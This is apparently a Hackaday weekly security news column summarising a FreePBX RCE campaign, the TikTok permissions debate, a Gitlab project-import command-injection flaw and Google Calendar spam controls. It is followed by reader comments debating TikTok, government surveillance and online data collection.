This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, that use this feature, would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell code that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into an real PoC. Read the post for full details on the debugging journey.

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature, to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

14 thoughts on “This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

  1. Google already does that exact thing with YouTube (see the Trending tab, their “misinformation” campaigns, the suppression of LBRY/Odysee), and they exist in a Democratic Republic. It’s unfortunately not a “conspiracy theory” anymore, just a fact of life.

  2. The Google calendar spam issue seems so obviously an issue, that I’m surprised (1) how did anyone design this in the first place, and (2) how was I not aware of this before? (I don’t use Google calendar myself, but I’d have expected to have heard more people moaning about it).

    From my experience with Google Analytics, Google seem not to care much about spam.

  3. The vast majority of hand wringing we read about TikTok stems from the fact that it isn’t sufficiently under the control of the US national security state. There is a revolving door between platforms like Reddit, Twitter, and Facebook and the NSA/CIA/Atlantic Council. These platforms surveil us around the clock, transform our data into a “product,” and sell it on the market where the government can buy it – no warrant or subpoena necessary.

    They also enable countless propaganda campaigns of their own while suppressing and banning (much needed) radicalism and counterhegemonic thought.

    I don’t think TikTok will deliver us to the promised land. I don’t even use TikTok – but the arguments I see repeated against it over and over again fall pretty flat IMO. I don’t really care if Xi Jinpeng is reading my DMs on the other side of the globe. I’m much more concerned about the ultra-reactionary cops who are stationed down the street from me, who would deem me an enemy of the state if I explained my politics to them.

    1. I have a similar but slightly different take – its not that its not under US/FiveEyes etc control/monitoring that really causes concern – its more that the style of governance under which it operates is very different and looking ever more hostile to the democratic western ideals. So its more like giving free ammunition to a probable future enemy, making it easier for them to actually turn into a real future enemy – not only do they know what their ‘enemy’ the USA’s population is thinking, they have a direct line to influence it and fabricate or censor and so twist that population to their needs. Where the Googles and Facebooks of this world may be distorting and somewhat dangerous with their own agenda’s they still want the world pretty much as it is, so they can thrive on the freedoms they enjoy.

      Even the smartest person can be fooled by halfway competent lies, and nobody has the time to check a million sources and every paper ever published on every topic to properly educate themselves on everything and so hope to see the truth of every subject. Nor the understanding of the inevitable backroom dealings to know why now is the right time for all the vague rumours and spinnable facts to come out and upset the apple cart.

      It is not like there is a shortage of information about ourselves a government can put together from the entirely and deliberately public sources we, our friends and relations put out there. On top of all the various official paperwork required for loans/banking/drivers licensees – If they really want to spy on you they can, and most folks really make it very easy in trade for the convenience some of these platforms bring. Your government doesn’t need to own or have agreements with every web company to learn damn nearly everything about you if it wants to, and can filter that vast swath of data created by their population looking for the outliers that may be dangerous already – More data on any and all random individuals is at this stage probably far less than helpful, maybe even a hindrance as there is so much too process already.

      1. “It is not like there is a shortage of information about ourselves […] public sources we, our friends and relations put out there.”

        A couple weeks ago I was wondering how much info about myself I have posted solely on Hackaday over the years. And what I know about other regular commenters through their comments (it’s not like I am keeping a dossier on everyone, (I am not!) just by things they have written about themselves regarding health, marital status, family, education, work experience, geographical location, etc.)

        Just think of Google Contacts. By using it, they know the names, addresses, email, phone numbers, relationship, workplace, spouse, children, birthdays and birth dates of your friends, even those who have tried to keep their Internet presence to minimum. And the Terms of Service says they will submit the information to a government entity that requests it.

        1. Indeed, the Hackaday community undoubtedly knows more (or at least could if they cared to parse through all my comments) about me than any other internet only grouping as I really don’t use social media etc – though my real life friends do like to contact me through it from time to time so I have the accounts they just don’t really do anything but reveal the collection of my friends from the real world which like like each platform.

          Of course with HaD resembling anonymous to post on how much you can trust the names or content to be truthful…

          Submitted from the IP commonly used by Foldi-One, but its not me honest…

    2. It’s not what TicToc is used for as designed you’ve got to think of what else it could be used for.

      Example. When you’ve got facial recognition working very well in China due to a requirement for national lID, and you want to expand that beyond your borders to the westerners who “all look the same” what better way to do that with a video sharing platform?

      The newer generations are are much more likely to embrace facial recognition in their everyday lives than some of us older folks, when it’s coupled with convenience, like being able to order a lait just by winking at a camera.

      Not like this ever happened before with facebook huh.

Leave a Reply to The Commenter Formerly Known As Ren Cancel reply

Please be kind and respectful to help make the comments section excellent. (Comment Policy)

This site uses Akismet to reduce spam. Learn how your comment data is processed.